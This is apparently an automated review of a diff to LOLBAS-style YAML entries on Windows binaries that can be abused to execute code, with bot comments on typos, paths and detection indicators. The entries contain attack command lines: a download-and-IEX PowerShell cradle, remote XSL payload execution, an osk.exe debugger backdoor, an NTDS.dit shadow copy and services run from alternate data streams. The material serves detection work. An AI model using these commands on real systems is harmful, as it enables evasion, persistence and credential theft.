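Review bot: `- IOC:` is empty for a binary with five distinct execution variants listed above it; the visible command lines give concrete detection anchors: rundll32.exe with `javascript:` and `RunHTMLApplication` on its command line, and a module path containing `:` after the file name, as in `C:\ads\file.txt:ADSDLL.dll`. The `https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md` link was removed without a replacement; if the page moved, point at the new location rather than dropping it.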
| @@ -1,20 +1,28 @@ | ||||
| --- | ||||
| Name: Runonce.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Runonce.exe /AlternateShellStartup | ||||
|     Description: Executes a Run Once Task that has been configured in the registry. | ||||
|     Description: Executes a Run Once Task that has been configured in the registry | ||||
|     Usecase: Persistence, bypassing defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\runonce.exe | ||||
|   - c:\windows\sysWOW64\runonce.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\runonce.exe | ||||
|   - Path: C:\Windows\SysWOW64\runonce.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/990717080805789697 | ||||
|   - https://cmatskas.com/configure-a-runonce-task-on-windows/ | ||||
| Notes: | | ||||
|     Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
|     Requires Administrative access. | ||||
|   - Link: https://twitter.com/pabraeken/status/990717080805789697 | ||||
|   - Link: https://cmatskas.com/configure-a-runonce-task-on-windows/ | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
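Review bot: The top-level `Description:` is left empty for Runonce.exe while the other entries in this commit get a one-line purpose; fill it in. The removed `Requires Administrative access.` note is now only implied by `Privileges: Administrator`, which is acceptable. The IOC `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY` uses a placeholder; say that `YOURKEY` stands for any newly created subkey, so a detection author monitors key creation under that path rather than a literal name.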
| @@ -1,17 +1,28 @@ | ||||
| --- | ||||
| Name: Runscripthelper.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test | ||||
|     Description: Execute the PowerShell script named test.txt. | ||||
|     Description: Execute the PowerShell script named test.txt | ||||
|     Usecase: Bypass constrained language mode and execute Powershell script | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe    ' | ||||
|   - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe     ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe | ||||
|   - Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Event 4014 - Powershell logging | ||||
|  - IOC: Event 400 | ||||
| Resources: | ||||
|   - https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc | ||||
| Notes: Thanks to Matt Graeber - @mattifestation | ||||
|   - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc | ||||
| Acknowledgement: | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
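Review bot: The second path has a typo, `Path: CC:\Windows\WinSxS\...`, which should begin `C:\Windows\WinSxS\...`. The top-level `Description:` is also empty. The IOC `Event 4014 - Powershell logging` looks like a typo for 4104 (script block logging in the PowerShell operational log); naming the log source for both 4104 and `Event 400` would make the IOCs usable.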
| @@ -1,19 +1,27 @@ | ||||
| --- | ||||
| Name: SC.exe | ||||
| Description: Execute, Read ADS, Create Service, Start Service | ||||
| Author: '' | ||||
| Name: Sc.exe | ||||
| Description: Used by Windows to manage services | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: | | ||||
|           sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | ||||
|           sc start evilservice | ||||
|     Description: '' | ||||
|   - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice | ||||
|     Description: Creates a new service and executes the file stored in the ADS. | ||||
|     Usecase: Execute binary file hidden inside an alternate data stream | ||||
|     Category: Alternate data streams  | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\sc.exe | ||||
|   - C:\Windows\SysWOW64\sc.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\sc.exe | ||||
|   - Path: C:\Windows\SysWOW64\sc.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Services that gets created | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
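Review bot: The collapsed one-line command keeps a stray backslash, `start= auto\ & sc start evilservice`, left over from the removed block scalar; as written the `\` becomes part of the `start=` argument, so it should read `start= auto & sc start evilservice`. `Privileges: User` is doubtful here: `sc create` needs create rights on the service control manager, which a standard user does not have by default, so `Administrator` is the more accurate value. The IOC `Services that gets created` should read `Services that get created` and would be stronger if it named the tell-tale sign in the command, a `binPath` whose file name is followed by `:` (an alternate data stream).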
| @@ -1,21 +1,37 @@ | ||||
| --- | ||||
| Name: Scriptrunner.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Scriptrunner.exe -appvscript calc.exe | ||||
|     Description: Execute calc.exe. | ||||
|     Description: Executes calc.exe | ||||
|     Usecase: Execute binary through proxy binary to evade defensive counter measurments | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" | ||||
|     Description: Execute the calc.cmd script on the remote share. | ||||
|     Description: Executes calc.cmde from remote server | ||||
|     Usecase: Execute binary through proxy binary  from external server to evade defensive counter measurments | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\scriptrunner.exe | ||||
|   - c:\windows\sysWOW64\scriptrunner.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\scriptrunner.exe | ||||
|   - Path: C:\Windows\SysWOW64\scriptrunner.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Scriptrunner.exe should not be in use unless App-v is deployed | ||||
| Resources: | ||||
|   - https://twitter.com/KyleHanslovan/status/914800377580503040 | ||||
|   - https://twitter.com/NickTyrer/status/914234924655312896 | ||||
|   - https://github.com/MoooKitty/Code-Execution | ||||
| Notes: Thanks to Nick Tyrer - @NickTyrer | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/914800377580503040 | ||||
|   - Link: https://twitter.com/NickTyrer/status/914234924655312896 | ||||
|   - Link: https://github.com/MoooKitty/Code-Execution | ||||
| Acknowledgement: | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@nicktyrer' | ||||
| --- | ||||
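Review bot: Typos in the new lines: `Executes calc.cmde from remote server` (should be `calc.cmd`), `counter measurments` twice (should be `countermeasures`), and a double space in `proxy binary  from`. The handle also changed case from `@NickTyrer` to `@nicktyrer`; keep the form the linked tweet uses.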
| @@ -1,16 +1,27 @@ | ||||
| --- | ||||
| Name: SyncAppvPublishingServer.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by App-v to get App-v server lists | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" | ||||
|     Description: Example command on how inject Powershell code into the process | ||||
|     Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
|   - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed | ||||
| Resources: | ||||
|   - https://twitter.com/monoxgas/status/895045566090010624 | ||||
| Notes: Thanks to Nick Landers - @monoxgas | ||||
|   - Link: https://twitter.com/monoxgas/status/895045566090010624 | ||||
| Acknowledgement: | ||||
|   - Person: Nick Landers | ||||
|     Handle: '@monoxgas' | ||||
| --- | ||||
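Review bot: `C:\Windows\SysWOW64\SyncAppvPublishingServer.exe` is a newly added path that was not in the removed list; confirm it exists on the listed builds before recording it. The description `Example command on how inject Powershell code into the process` is missing a word (`how to inject`). The `OperatingSystem` line still lists Windows Vista through 8.1 for a binary the new top-level description ties to the App-V client; that range deserves a check.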
| @@ -1,20 +1,28 @@ | ||||
| --- | ||||
|  --- | ||||
| Name: Wab.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Windows address book manager | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Wab.exe | ||||
|     Description: Loads a DLL configured in the registry under HKLM. | ||||
|   - Command: wab.exe | ||||
|     Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice | ||||
|     Usecase: Execute dll file. Bypass defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Program Files\Windows Mail\wab.exe    ' | ||||
|   - 'C:\Program Files (x86)\Windows Mail\wab.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Program Files\Windows Mail\wab.exe | ||||
|   - Path: C:\Program Files (x86)\Windows Mail\wab.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: WAB.exe should normally never be used | ||||
| Resources: | ||||
|   - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ | ||||
|   - https://twitter.com/Hexacorn/status/991447379864932352 | ||||
| Notes: | | ||||
|     Thanks to Adam - @Hexacorn | ||||
|     Requires registry changes, Requires Administrative Access | ||||
|   - Link: https://twitter.com/Hexacorn/status/991447379864932352 | ||||
|   - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
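Review bot: The new first line ` ---` has a leading space, so it is no longer a YAML document marker; the file now starts with a scalar and will not parse the way the other entries do. Drop the space. The removed note `Requires registry changes, Requires Administrative Access` is partly preserved by `Privileges: Administrator` and the new description `Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice`; for detection, a write to `HKLM\Software\Microsoft\WAB\DLLPath` is a more durable IOC than `WAB.exe should normally never be used`, so consider listing it as a second IOC.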
| @@ -1,46 +1,85 @@ | ||||
| --- | ||||
| Name: WMIC.exe | ||||
| Description: Reconnaissance, Execute, Read ADS | ||||
| Author: '' | ||||
| Name: Wmic.exe | ||||
| Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: wmic.exe process call create calc | ||||
|     Description: Execute calc.exe. | ||||
|   - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" | ||||
|     Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). | ||||
|   - Command: wmic.exe useraccount get /ALL | ||||
|     Description: List the user accounts on the machine. | ||||
|   - Command: wmic.exe process get caption,executablepath,commandline | ||||
|     Description: Gets the command line used to execute a running program. | ||||
|   - Command: wmic.exe qfe get description,installedOn /format:csv | ||||
|     Description: Gets a list of installed Windows updates. | ||||
|   - Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") | ||||
|     Description: Check to see if the target system is running SQL. | ||||
|   - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" | ||||
|     Description: Use the PowerShell cmdlet to list the shares on a remote server. | ||||
|   - Command: wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
|     Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process call create calc | ||||
|     Description: Execute calc from wmic | ||||
|     Usecase: Execute binary from wmic to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
|     Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. | ||||
|     Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" | ||||
|     Description: Execute evil.exe on the remote system. | ||||
|     Usecase: Execute binary on a remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | ||||
|     Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. | ||||
|     Usecase: Execute binary with scheduled task created with wmic on a remote computer | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
|   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
|     Description: Execute a script contained in the target .XSL file hosted on a remote server. | ||||
|   - Command: wmic.exe os get /format:"MYXSLFILE.xsl" | ||||
|     Description: Executes JScript or VBScript embedded in the target XSL stylesheet. | ||||
|     Usecase: Execute binary on remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" | ||||
|     Description: Create a volume shadow copy of NTDS.dit that can be copied. | ||||
|     Usecase: Execute binary on remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" | ||||
|     Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. | ||||
|  | ||||
|     Usecase: Execute script from remote system | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\wbem\wmic.exe | ||||
|   - c:\windows\sysWOW64\wbem\wmic.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\wmic.exe | ||||
|   - Path: C:\Windows\SysWOW64\wmic.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Wmic getting scripts from remote system | ||||
| Resources: | ||||
|   - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory | ||||
|   - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html | ||||
|   - https://twitter.com/subTee/status/986234811944648707 | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|   - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory | ||||
|   - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html | ||||
|   - Link: https://twitter.com/subTee/status/986234811944648707 | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
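Review bot: Several problems in the Wmic entry. First, the Full Path lines drop the `wbem` directory: `C:\Windows\System32\wmic.exe` replaces `c:\windows\system32\wbem\wmic.exe` (same for SysWOW64), and wmic.exe lives under `wbem`, so the removed paths were correct. Second, the `/user: /password: /node:` command lost its `<username>`, `<password>` and `<computer_name>` placeholders and now shows three empty switches. Third, the description `Create a volume shadow copy of NTDS.dit that can be copied.` is attached to the `process get brief /format:"https://...Wmic_calc.xsl"` command; the removed `Execute a script contained in the target .XSL file hosted on a remote server.` belongs there, and its `Usecase: Execute binary on remote system` should be corrected to match. Fourth, a stray blank line sits between `Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.` (typo: stylesheet) and its `Usecase:`. The local-file variant `wmic.exe os get /format:"MYXSLFILE.xsl"` is also removed without a note.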
| @@ -1,17 +1,27 @@ | ||||
| --- | ||||
| Name: Wscript.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Used by Windows to execute scripts | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: wscript c:\ads\file.txt:script.vbs | ||||
|     Description: Executes the .VBS script stored as an Alternate Data Stream (ADS). | ||||
|     Description: Execute script stored in an alternate data stream | ||||
|     Usecase: Execute hidden code to evade defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\wscript.exe | ||||
|   - c:\windows\sysWOW64\wscript.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\wscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\wscript.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Wscript.exe executing code from alternate data streams | ||||
| Resources: | ||||
|   - '?' | ||||
| Notes: Thanks to ? | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
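Review bot: The new description `Execute script stored in an alternate data stream` drops the script type the removed line stated (`Executes the .VBS script stored as an Alternate Data Stream (ADS).`); keep that detail, since the `.vbs` name in the stream and the `:` in the path argument are what the IOC `Wscript.exe executing code from alternate data streams` keys on.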
| @@ -1,21 +1,29 @@ | ||||
| --- | ||||
| Name: Xwizard.exe | ||||
| Description: DLL hijack, Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: xwizard.exe | ||||
|     Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. | ||||
|   - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | ||||
|     Description: Xwizard.exe running a custom class that has been added to the registry. | ||||
|     Usecase: Run a com object created in registry to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\xwizard.exe | ||||
|   - c:\windows\sysWOW32\xwizard.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\xwizard.exe | ||||
|   - Path: C:\Windows\SysWOW64\xwizard.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ | ||||
|   - https://www.youtube.com/watch?v=LwDHX7DVHWU | ||||
|   - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | ||||
| Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer | ||||
|   - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ | ||||
|   - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU | ||||
|   - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
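Review bot: Top-level `Description:` and the Detection `- IOC:` are both left empty. The removed `xwizard.exe` command with the DLL-hijack description (`xwizards.dll` loaded from the same directory) is gone, yet the hexacorn link that documents it stays in Resources and `@Hexacorn` stays credited; either keep that command or explain the removal. For the surviving `xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}` command, which the description says runs a custom class added to the registry, a usable IOC is xwizard.exe launched with `RunWizard` and a CLSID registered outside the built-in wizard classes. Good catch correcting `sysWOW32` to `SysWOW64`.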